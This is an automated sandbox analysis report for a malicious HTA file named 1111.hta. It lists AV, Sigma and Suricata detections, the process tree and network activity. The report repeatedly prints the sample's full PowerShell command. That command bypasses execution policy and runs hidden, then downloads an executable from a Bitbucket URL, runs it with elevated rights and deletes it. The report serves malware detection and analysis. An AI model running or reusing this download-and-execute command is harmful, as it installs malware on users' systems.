Edit tour

Windows Analysis Report
1111.hta

Overview

General Information

Sample name:	1111.hta
Analysis ID:	1583734
MD5:	91b57eb5e0925c7522374b0c64902dfd
SHA1:	437da5eb27efeb38a9b7f804066205964a345a33
SHA256:	e5f2879072cdd3e4905f5fa8017be818d2c61f718d0fd322196e9cd54062ba4a
Tags:	downloaderhtamalwareuser-Joker
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and execute file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

AI detected suspicious sample

Bypasses PowerShell execution policy

Sigma detected: PowerShell DownloadFile

Sigma detected: Suspicious MSHTA Child Process

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6328 cmdline: mshta.exe "C:\Users\user\Desktop\1111.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 6676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 6676	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\1111.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6328, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , ProcessId: 6676, ProcessName: powershell.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\1111.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6328, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , ProcessId: 6676, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\1111.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6328, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , ProcessId: 6676, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\1111.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6328, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , ProcessId: 6676, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\1111.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6328, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , ProcessId: 6676, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\1111.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6328, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , ProcessId: 6676, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Powershell download and execute file

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\1111.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6328, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force" , ProcessId: 6676, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Single char EXE direct download likely trojan (multiple families)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T13:33:57.971582+0100	2018581	1	A Network Trojan was detected	192.168.2.4	49730	185.166.143.50	443	TCP

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 1111.hta

Virustotal: Detection: 11%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 91.7% probability

Source: unknown

HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.4:49730 version: TLS 1.2

Source:

Binary string: ystem.pdb source: powershell.exe, 00000001.00000002.1993075264.0000000007811000.00000004.00000020.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49730 -> 185.166.143.50:443

Source: global traffic

HTTP traffic detected: GET /docspaceplace/test2/downloads/1.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 185.166.143.50 185.166.143.50

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /docspaceplace/test2/downloads/1.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: bitbucket.org

Source: powershell.exe, 00000001.00000002.1991289274.0000000005C76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1988997103.0000000004D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1988997103.0000000004C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1988997103.0000000004D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1988997103.0000000004C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/abde48e0-2204-4082-9ce6-f7134fa8a7af/downloads/d2d2c2de-519e-
Source: powershell.exe, 00000001.00000002.1988997103.0000000004D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: mshta.exe, 00000000.00000002.1669144303.0000000003386000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1665182251.0000000003385000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1667893152.0000000003385000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/docspa$H9
Source: mshta.exe, 00000000.00000002.1669144303.0000000003386000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1665182251.0000000003385000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1667893152.0000000003385000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/docspace
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/docspaceplace
Source: powershell.exe, 00000001.00000002.1988256493.000000000304B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988213976.0000000002F50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1993136767.0000000007831000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/docspaceplace/test2/downloads/1.exe
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: powershell.exe, 00000001.00000002.1991289274.0000000005C76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1991289274.0000000005C76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1991289274.0000000005C76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: powershell.exe, 00000001.00000002.1988997103.0000000004D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1988997103.00000000053FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1991289274.0000000005C76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000001.00000002.1988997103.0000000004E6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1988997103.0000000004E68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal96.evad.winHTA@4/4@1/1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwku2lq1.j52.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1111.hta

Virustotal: Detection: 11%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\1111.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
